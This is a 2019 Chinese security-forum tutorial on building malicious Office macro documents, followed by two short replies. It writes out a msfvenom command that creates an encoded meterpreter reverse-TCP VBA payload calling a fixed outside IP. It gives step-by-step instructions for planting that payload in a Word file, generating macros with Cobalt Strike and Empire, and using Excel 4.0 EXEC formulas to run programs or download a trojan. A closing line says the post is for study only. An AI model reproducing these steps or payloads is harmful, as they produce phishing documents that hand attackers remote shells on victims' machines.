用户
搜索
  • TA的每日心情
    开心
    2018-12-11 19:06
  • 签到天数: 9 天

    连续签到: 1 天

    [LV.3]经常看看I

    i春秋作家

    Rank: 7Rank: 7Rank: 7

    12

    主题

    41

    帖子

    275

    魔法币
    收听
    1
    粉丝
    2
    注册时间
    2016-6-22

    i春秋签约作者

    发表于 2019-10-26 21:34:18 25293
    本帖最后由 佳哥 于 2019-10-26 21:34 编辑

    一、前言
    快毕业,要出去找工作了,加快多发发点文章,文章有点水,大佬们别喷。

    二、msfVENOM生成宏
    在linux中,msfvenom生成vba文件
    msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 lhost=101.132.43.162 lport=6666 -f vba -o 123.vba
    1.png
    建一个word或者excel文档,点击视图->宏->查看宏
    2.png
    输入宏名字,选择宏的位置为当前文档的名字,点击创建宏
    3.png
    将msfvenom生成的vba的payload复制到里面,保存,点击否
    4.png
    保存为docm或者doc,这里我保存doc,打开该文件,点击启用宏
    5.png
    metasploit监听带你看,就是反弹一个shell
    6.png

    三、CobaltStrike生成宏
    打开cobaltstrike,点击攻击->生成后门->MS->Office->Micro
    7.png
    复制payload到word里面,cobaltstrike反弹shell成功
    8.png

    四、Empire生成宏
    启动empire,选择windows/macro
    listeners
    uselistener http
    set Name test
    set Host [url=http://xx.xx.xx.xx:6666][color=#03884]http://xx.xx.xx.xx:6666[/color][/url]
    set Port 6666
    execute

    9.png
    usestager windows/macro
    set Listener test
    set OutFile /root/1.txt
    execute

    10.png

    五、Excel4.0执行payload
    利用excel4.0可以执行恶意代码,打开excel,插入Excel4.0
    11.png
    利用exec弹计算机
    =EXEC("calc.exe")
    =ALERT("Hello, World")
    =HALT()

    13.png
    可以利用这个下载我们的木马执行
    AD46B68228C6446DB9F029DE055DE0D1.png

    六、后记
    该文章仅供学习交流,禁止非法传播。















    发表于 2019-10-27 03:06:01
    666            
    使用道具 举报 回复
    发表于 2019-11-9 22:55:24
    学习学习。。。
    寻一方沃土
    使用道具 举报 回复
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册